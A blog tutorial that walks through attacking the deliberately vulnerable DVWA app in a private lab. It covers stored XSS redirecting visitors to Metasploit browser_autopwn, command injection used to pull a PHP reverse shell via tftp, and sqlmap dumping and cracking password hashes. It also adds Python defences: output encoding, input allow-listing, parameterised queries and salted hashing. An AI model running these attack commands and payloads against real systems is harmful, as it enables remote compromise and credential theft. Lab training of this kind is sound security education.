26 November 2011

How to learn with Damn Vulnerable Web Application

Hello and welcome. Today I’ll be writing a tutorial on the basics of web hacking. To make the learning experience more enjoyable we’ll be using “Damn Vulnerable Web Application (DVWA)”, which is designed as a web security learning platform. I will only be demonstrating three scenarios which lead to a server compromise: (1) Persistent XSS + IFRAME, (2) Command Execution and (3) MySQL Injection. There are many more test cases which can be examined, but I leave that up to the diligent reader’s own discretion. You can download “Damn Vulnerable Web Application (DVWA)” HERE. Setting up this lab is quite easy, so don’t hesitate to try it for yourself…

Thian Septian Sevenfoldarchuleta, this is for you my friends...

Ok, let’s get to the good stuff. I’ll be using two VMs:
Attacker : Backtrack 5 =>  192.168.111.129
Victim : Windows XP =>  192.168.111.130


1. Persistent XSS + IFRAME
Cross Site Scripting isn’t always appreciated as a legitimate attack vector, but as we’ll see, persistent XSS can have some nasty implications. We’ll start off by browsing to the “Sign Guestbook” page. Because user input is stored and echoed back without sanitisation or output encoding, we are able to inject client-side scripts into the message box. Using an IFRAME we can redirect any user visiting this Guestbook to our malicious server. In the screenshot below you can see our “innocent” message being posted. Take note of the URI path being used, "/innocent".

Code :  http://pastebin.com/Wpdv2Ps0
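The fix on the application side is output encoding: every user-controlled value is HTML-entity encoded when the guestbook page is rendered, so a stored `<iframe>` is displayed as text rather than parsed as markup. The following Python is an added example written for this post, not DVWA’s own (PHP) code; it pairs the encoding step with a small audit routine that flags entries already sitting in the database which would load or execute remote content if rendered raw. The sample entries are constructed; the second one reuses the attacker address and "/innocent" path from the scenario above.

```python
import html
import re

# Markup that turns a stored guestbook entry into active content when rendered
# unencoded. Constructed, illustrative list: not exhaustive.
ACTIVE_CONTENT = re.compile(
    r"<\s*(iframe|script|object|embed)\b"   # tags that load or run remote content
    r"|\bon[a-z]+\s*="                      # inline event handlers (onload=, onerror=, ...)
    r"|javascript:",                        # javascript: URLs
    re.IGNORECASE,
)


def render_entry(name, message):
    """Build the HTML for one guestbook entry with every user-controlled value
    HTML-entity encoded on output. '<iframe ...>' reaches the visitor's browser
    as '&lt;iframe ...&gt;', i.e. visible text, never a frame."""
    return '<div class="entry"><b>{}</b>: {}</div>'.format(
        html.escape(name, quote=True), html.escape(message, quote=True)
    )


def is_active_content(message):
    """True when an entry contains markup that would execute or load remote
    content if rendered unencoded. Meant for auditing rows that were stored by
    the vulnerable version of the form before the fix went in."""
    return ACTIVE_CONTENT.search(message) is not None


def audit_entries(entries):
    """Return the ids of stored (id, name, message) rows flagged by is_active_content()."""
    return [eid for eid, _name, msg in entries if is_active_content(msg)]


# Constructed sample rows modelled on the post: one benign message and one that
# embeds a frame pointing at "/innocent" on the attacker's host (192.168.111.129).
SAMPLE_ENTRIES = [
    (1, "alice", "Nice site, keep it up!"),
    (2, "mallory", 'Great site!<iframe src="http://192.168.111.129/innocent"></iframe>'),
]

if __name__ == "__main__":
    for eid, name, msg in SAMPLE_ENTRIES:
        print(eid, "FLAGGED" if is_active_content(msg) else "ok")
        print("   ", render_entry(name, msg))
```

The audit regex errs on the side of flagging (any `on...=` substring matches), which is the right trade-off for a one-off review of stored data; the encoding in render_entry is what actually closes the hole, and it does not depend on the audit catching everything.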


Ok, so far so good. Now let’s set up a client-side exploit server for our unsuspecting victim to connect to. First of all, make sure your Backtrack machine isn’t already using port 80 (for example if you’re hosting an Apache server). Fire up msfconsole and select the browser_autopwn module, taking care to configure the options properly. Below you can see my sample configuration (be sure to set the correct URI path)…

msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.111.129  yes       The IP address to use for reverse-connect payloads
   SRVHOST     192.168.111.129  yes       The local host to listen on. 
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate
   SSLVersion  SSL3             no        Specify the version of SSL that should be used
   URIPATH     /innocent        no        The URI to use for this exploit (default is random)
   
msf  auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2011-11-09 05:36:52 +0100
[*] Done in 1.041111216 seconds

[*] Starting exploit modules on host 192.168.111.129...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.111.129:80/EKlBI
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload 
    java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.111.129:80/hhbLra
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.111.129:80/JaTFlOKmWUq

[...snip...]

[*] --- Done, found 23 exploit modules

[*] Using URL: http://192.168.111.129:80/innocent
[*] Server started.

Perfect, everything is set up. All we have to do now is wait for our unsuspecting victim to view the Guestbook page. As you can see in the screenshot below, when our victim views the page he/she sees nothing visibly malicious about our post (if you like you can even insert a real message before your IFRAME). Even though nothing fishy seems to be going on, our victim is redirected to our exploit server, which leverages browser exploits to get shell access.


[*] Using URL: http://192.168.111.129:80/innocent
[*] Server started.
[*] 192.168.111.130  Browser Autopwn request '/innocent'
[*] 192.168.111.130  Browser Autopwn request 
    '/innocent?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AwOmVuLXVzOng4NjpNU0lFOjYuMDo%3d'
[*] 192.168.111.130  JavaScript Report: Microsoft Windows:XP:SP0:en-us:x86:MSIE:6.0:
[*] Responding with exploits
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.111.130:1083...
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.130:1084 (target: IE 6 
    SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to 192.168.111.130
[*] Meterpreter session 1 opened (192.168.111.129:3333 -> 192.168.111.130:1085) at 2011-11-09 
    05:38:35 +0100
[*] Session ID 1 (192.168.111.129:3333 -> 192.168.111.130:1085) processing InitialAutoRunScript 
    'migrate -f'
[*] Current server process: iexplore.exe (3460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3684
[+] Successfully migrated to process 

msf  auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information                              Connection
  --  ----                   -----------                              ----------
  1   meterpreter x86/win32  FLUXX-J18BEF9YQ\Owner @ FLUXX-J18BEF9YQ  192.168.111.129:3333 -> 
                                                                      192.168.111.130:1085

msf  auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:fc4305db8da15f1e2404624e4bf5045f:bfcea702c343c38e5598448fd52782e8:::
Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d515e27c8b5a477fe5189a1377c6c7e2:::
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                          Path
 ---   ----               ----  -------  ----                          ----
 0     [System Process]                                                
 1000  svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\System32\svchost.exe
 1056  svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\svchost.exe
 1340  explorer.exe       x86   0        FLUXX-J18BEF9YQ\Owner         C:\WINDOWS\Explorer.EXE

[...snip...]

 636   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 648   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 808   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 908   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe

meterpreter > migrate 648
[*] Migrating to 648...
[*] Migration completed successfully.
meterpreter > shell
Process 3952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.111.130
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 

C:\WINDOWS\system32>


2. Command Execution
If we browse to the “Command Execution” tab we are presented with a small PHP utility that allows us to ping remote machines. After a bit of fooling around I discovered you can make the utility execute multiple commands by chaining them together with the “&” character: the user-supplied address is concatenated into a shell command line, so cmd.exe treats everything after the “&” as a second command. Our end-game ploy in this demo is to remotely execute a PHP exploit, so first of all we have to find a way to transfer our malicious payload to the remote machine. There are many ways to do this: ftp, tftp, inline transfer, web browser,… To get an idea of what we have to work with we can get a directory listing of C:\WINDOWS\system32, which contains the binaries of the programs installed on the remote server. As we can see below we are in luck: tftp is installed on the remote machine (this is the most practical transfer method for non-interactive command line execution).

Code : & cd ../../../../../../../../WINDOWS/system32 & dir
       
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] target_name

Options:
    -t             Ping the specified host until stopped.
                   To see statistics and continue - type Control-Break;
                   To stop - type Control-C.
    -a             Resolve addresses to hostnames.
    -n count       Number of echo requests to send.
    -l size        Send buffer size.
    -f             Set Don't Fragment flag in packet.
    -i TTL         Time To Live.
    -v TOS         Type Of Service.
    -r count       Record route for count hops.
    -s count       Timestamp for count hops.
    -j host-list   Loose source route along host-list.
    -k host-list   Strict source route along host-list.
    -w timeout     Timeout in milliseconds to wait for each reply.

 Volume in drive C has no label.
 Volume Serial Number is 7833-0FA5

 Directory of C:\WINDOWS\system32

[...snip...]

08/29/2002  08:00 PM            71,168 telnet.exe
08/29/2002  08:00 PM           343,552 termmgr.dll
08/29/2002  08:00 PM           200,192 termsrv.dll
08/29/2002  08:00 PM            16,896 tftp.exe
08/29/2002  08:00 PM           384,000 themeui.dll
08/29/2002  08:00 PM            90,112 timedate.cpl
08/29/2002  08:00 PM             4,048 timer.drv

[...snip...]

08/29/2002  08:00 PM             9,728 xolehlp.dll
08/29/2002  08:00 PM           187,904 xpsp1res.dll
08/29/2002  08:00 PM           316,416 zipfldr.dll
            1635 File(s)    254,218,638 bytes
              39 Dir(s)   2,506,862,592 bytes free
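The underlying defect is that the utility builds one shell string from user input. The hardened pattern is to allow-list the target (a literal IP address or a syntactically valid hostname, nothing else) and hand it to ping as a separate argv element with no shell involved. The Python below is an added example for this post, not DVWA’s code; it shows the vulnerable string-building pattern next to the hardened form, plus a metacharacter check that can be run over logged ping targets to spot chained commands like the ones used above. The hostname regex and the metacharacter list are constructed approximations.

```python
import ipaddress
import os
import re
import subprocess

# Characters that let a caller append or redirect commands in cmd.exe or sh.
# Constructed list for this example; adjust to the shell actually in play.
SHELL_META = re.compile(r"[&|;`$<>\n\r(){}]")

# Approximation of an RFC 1123 hostname: dot-separated labels of letters,
# digits and hyphens, 253 characters max (constructed; illustrative).
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def is_valid_target(value):
    """Allow-list check: accept only a literal IP address or a valid hostname.
    '192.168.111.129 & dir' fails because the whole string must match."""
    value = value.strip()
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME.match(value) is not None


def looks_like_injection(value):
    """Detection view of the same input: True if a submitted ping target
    contains a shell metacharacter. Useful when scanning request logs."""
    return SHELL_META.search(value) is not None


def vulnerable_command(target):
    """The pattern the DVWA utility exhibits, rebuilt here for illustration
    (not DVWA's code): the input is concatenated into one shell string, so
    everything after an '&' becomes a second command."""
    return "ping -n 3 " + target


def safe_argv(target):
    """Hardened form: validate first, then pass the target as its own argv
    element so no shell ever parses it."""
    if not is_valid_target(target):
        raise ValueError("invalid ping target: %r" % target)
    count_flag = "-n" if os.name == "nt" else "-c"   # Windows vs. Unix ping
    return ["ping", count_flag, "3", target.strip()]


def run_ping(target):
    """Execute ping with shell=False; argv goes straight to the ping binary."""
    return subprocess.run(safe_argv(target), shell=False,
                          capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    for candidate in ["192.168.111.129", "& cd c:\\xampp\\htdocs & tftp -i 192.168.111.129 GET evil.php"]:
        print(repr(candidate), "valid" if is_valid_target(candidate) else "REJECTED",
              "| metachar" if looks_like_injection(candidate) else "")
```

Note that the two checks serve different purposes: is_valid_target is the control (reject anything outside the allow-list), while looks_like_injection is only a signal for log review and would miss, for instance, a hostname that is merely unexpected.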


Let’s go back to our Backtrack machine to create our PHP payload and set up a tftp server to host it.

root@bt:~# atftpd --daemon --port 69 /tmp/
root@bt:~# netstat -anup
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 192.168.111.129:53569   192.168.111.1:53        ESTABLISHED 1496/firefox-bin
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1797/dhclient   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1075/dhclient3  
udp        0      0 0.0.0.0:69              0.0.0.0:*                           2004/atftpd

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 O

       Name: PHP Meterpreter, PHP Reverse TCP stager
     Module: payload/php/meterpreter/reverse_tcp
    Version: 12196, 12196
   Platform: PHP
       Arch: php
Needs Admin: No
 Total size: 1286
       Rank: Normal

Provided by:
  egypt 

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.111.129  yes       The listen address
LPORT  9988             yes       The listen port

Description:
  Reverse PHP connect back stager with checks for disabled functions, 
  Run a meterpreter server in PHP

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 R > /tmp/evil.php
root@bt:~# ls -l /tmp/
total 28
drwx------ 2 root root 4096 2011-11-09 04:17 kde-root
drwx------ 2 root root 4096 2011-11-09 04:17 ksocket-root
drwx------ 2 root root 4096 2011-11-09 04:17 orbit-root
drwx------ 2 root root 4096 2011-11-09 04:17 pulse-3uavuaOb9vyJ
-rw------- 1 root root  141 2011-11-09 04:17 serverauth.pWwJb7S99J
drwx------ 2 root root 4096 2011-11-09 04:17 ssh-ZXZzWw1229
-rw-r--r-- 1 root root 1286 2011-11-09 04:44 evil.php


Ok, we’re all set; let’s return to our “Command Execution” tab. We are going to make the remote machine use tftp to download our payload and place it in the web root. Take note that xampp’s web root is located in C:\xampp\htdocs. As we can see in the screenshot below, our payload has successfully been downloaded. Once this has been accomplished we can use the attacker’s browser to open http://192.168.111.130/evil.php, which will then automatically execute our payload.

Code : & cd c:\xampp\htdocs & tftp -i 192.168.111.129 GET evil.php


msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.111.129  yes       The listen address
   LPORT  9988             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:9988 
[*] Starting the payload handler...
[*] Sending stage (38553 bytes) to 192.168.111.130
[*] Meterpreter session 1 opened (192.168.111.129:9988 -> 192.168.111.130:1053) at 2011-11-09 
    05:16:13 +0100


meterpreter > shell
Process 3156 created.
Channel 0 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\apache>


3. MySQL Injection
To wrap up the tutorial let’s have a look at MySQL injection. To follow this tutorial in Backtrack you’ll have to install a Firefox plug-in called Tamper Data; it will allow you to intercept and modify HTTP/HTTPS headers and POST parameters (big up to anyone who has modified some poorly configured online poll hehe). Browse to the “SQL Injection” tab, start Tamper Data, enter a number in the field (1 to 5) and press enter. Tamper Data will alert you that it has intercepted a request; allow it to continue and then examine the contents of the data. You should see something like the screenshot below.


Copy the entire content of the “Cookie” field. We will be using this data as a parameter for sqlmap. Achieving injection is pretty easy, observe the syntax below…

root@bt:/pentest/database/sqlmap# ./sqlmap.py 
--url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low'

[...snip...]

sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 3474 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,112,117,58),(SELECT (CASE WHEN
   (3474=3474) THEN 1 ELSE 0 END)),CHAR(58,113,101,109,58),FLOOR(RAND(0)*2))x FROM 
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iXZd'='iXZd&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,106,112,117,58),IFNULL(CAST(CHAR(75,115,118,88,119,75,
    101,111,85,115) AS CHAR),CHAR(32)),CHAR(58,113,101,109,58)), NULL# AND 'fpda'='fpda&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'ZrXF'='ZrXF&Submit=Submit
---

[06:16:54] [INFO] manual usage of GET payloads requires url encoding
[06:16:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[06:16:54] [INFO] Fetched data logged to text files under /pentest/database/sqlmap/output/192.168.111.130

[*] shutting down at: 06:16:54

So the injection is successful. You can see that we used the data recovered from Tamper Data (note that without this cookie data, which carries the session and the security=low setting, the injection cannot be achieved). If we add the --dbs flag to the command above we will get a list of the available databases, as shown below.

[...snip...]

[06:19:36] [INFO] fetching database names
available databases [8]:
[*] cdcol
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[...snip...]
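Why did the id parameter inject at all? The page quotes the value into the SQL string, and sqlmap’s boolean payloads (`... AND 'ZrXF'='ZrXF`) simply close that quote and continue the WHERE clause. The Python below is an added example for this post, not DVWA’s code, using an in-memory SQLite stand-in for the dvwa.users table (names taken from the dump further down; user ids are constructed). It runs the same lookup twice, once with string concatenation and once with a bound parameter, against the boolean tail of the time-based payload shown above with the MySQL-only SLEEP() removed.

```python
import sqlite3

# Constructed stand-in for dvwa.users: names from the post's dump, ids made up.
USERS = [
    (1, "admin", "admin", "admin"),
    (2, "smithy", "Bob", "Smith"),
    (3, "pablo", "Pablo", "Picasso"),
]

# Boolean tail of sqlmap's time-based payload from the post, minus SLEEP(5),
# which SQLite does not implement. The leading quote closes the page's own
# quoting of the id value; the trailing 'ZrXF'='ZrXF is always true and its
# final quote is supplied by the template.
PAYLOAD = "1' AND 'ZrXF'='ZrXF"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, "
                "first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users (user_id, user, first_name, last_name) "
                    "VALUES (?, ?, ?, ?)", USERS)
    return con


def lookup_concat(con, user_id):
    """The vulnerable pattern: the value is quoted into the SQL text, so an
    input that contains a quote rewrites the WHERE clause."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return con.execute(sql).fetchall()


def lookup_param(con, user_id):
    """Hardened pattern: the value is bound as a parameter, so the database
    treats the whole string as data and never parses it as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    for label, fn in (("concatenated", lookup_concat), ("parameterised", lookup_param)):
        print(label, "| id=1 ->", fn(con, "1"), "| payload ->", fn(con, PAYLOAD))
```

With the concatenated query the payload returns the admin row, because the statement became `WHERE user_id = '1' AND 'ZrXF'='ZrXF'`; with the bound parameter the database compares the column against the literal 19-character string and returns nothing. The same distinction defeats the UNION and error-based payloads sqlmap listed: they all rely on the first quote terminating the string literal. In the PHP code behind DVWA the equivalent is a prepared statement with bound parameters rather than building the query with string interpolation.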

After some enumeration, I discovered that the database “dvwa” contained a table named “users”. Dumping this table reveals a list of users and their password hashes. I then proceeded to run a dictionary-based attack on these hashes, and in less than 30 seconds they were all cracked.



root@bt:/pentest/database/sqlmap# ./sqlmap.py 
--url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#' 
--cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low' -D dvwa -T users --dump

[...snip...]

+---------------------------------+------------+-----------+----------------------------------+---------+
| avatar                          | first_name | last_name | password                         | user    |
+---------------------------------+------------+-----------+----------------------------------+---------+
| dvwa/hackable/users/admin.jpg   | admin      | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 | admin   |
| dvwa/hackable/users/smithy.jpg  | Bob        | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 | smithy  |
| dvwa/hackable/users/pablo.jpg   | Pablo      | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 | pablo   |
| dvwa/hackable/users/1337.jpg    | Hack       | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b | 1337    |
| dvwa/hackable/users/gordonb.jpg | Gordon     | Brown     | e99a18c428cb38d5f260853678922e03 | gordonb |
+---------------------------------+------------+-----------+----------------------------------+---------+

+---------+      +------------+
| user    |      | passwords  |
+---------+      +------------+
| admin   | ===> |  password  |
| smithy  | ===> |  password  |
| pablo   | ===> |  letmein   |
| 1337    | ===> |  charley   |
| gordonb | ===> |  abc123    |
+---------+      +------------+
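The reason the dump fell so quickly is visible in the table itself: the hashes are plain, unsalted MD5, so admin and smithy share a digest and every entry can be matched against a precomputed wordlist. The Python below is an added example for this post, not DVWA’s code. It confirms the digest format against the dumped values, lists users whose hashes collide, and shows the storage scheme that would have resisted the dictionary attack: a per-user random salt with an iterated key derivation (PBKDF2-HMAC-SHA256 here) and constant-time comparison. The storage format string is an assumption for this example.

```python
import hashlib
import hmac
import os

# user -> stored hash, copied from the dump in the post.
DUMPED = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
}


def md5_hex(password):
    """Unsalted MD5 as stored by the dumped table: deterministic, so equal
    passwords produce equal digests and precomputed tables apply directly."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def shared_hashes(table):
    """Map each digest that appears more than once to the users sharing it.
    Any hit here means those users chose the same password, and a crack of
    one is a crack of all of them."""
    by_hash = {}
    for user, digest in table.items():
        by_hash.setdefault(digest, []).append(user)
    return {d: users for d, users in by_hash.items() if len(users) > 1}


def hash_password(password, iterations=200_000, salt=None):
    """Salted, iterated hash. Format (assumed for this example):
    pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("collisions in dump:", shared_hashes(DUMPED))
    for user in ("admin", "smithy"):
        h = hash_password("password")     # same password, different salt each time
        print(user, h[:40] + "...", verify_password("password", h))
```

Two users with the same password now get different stored values, and each guess against a salted record costs one full PBKDF2 derivation rather than one table lookup, which is what turns a 30-second job into an impractical one for a wordlist of any size.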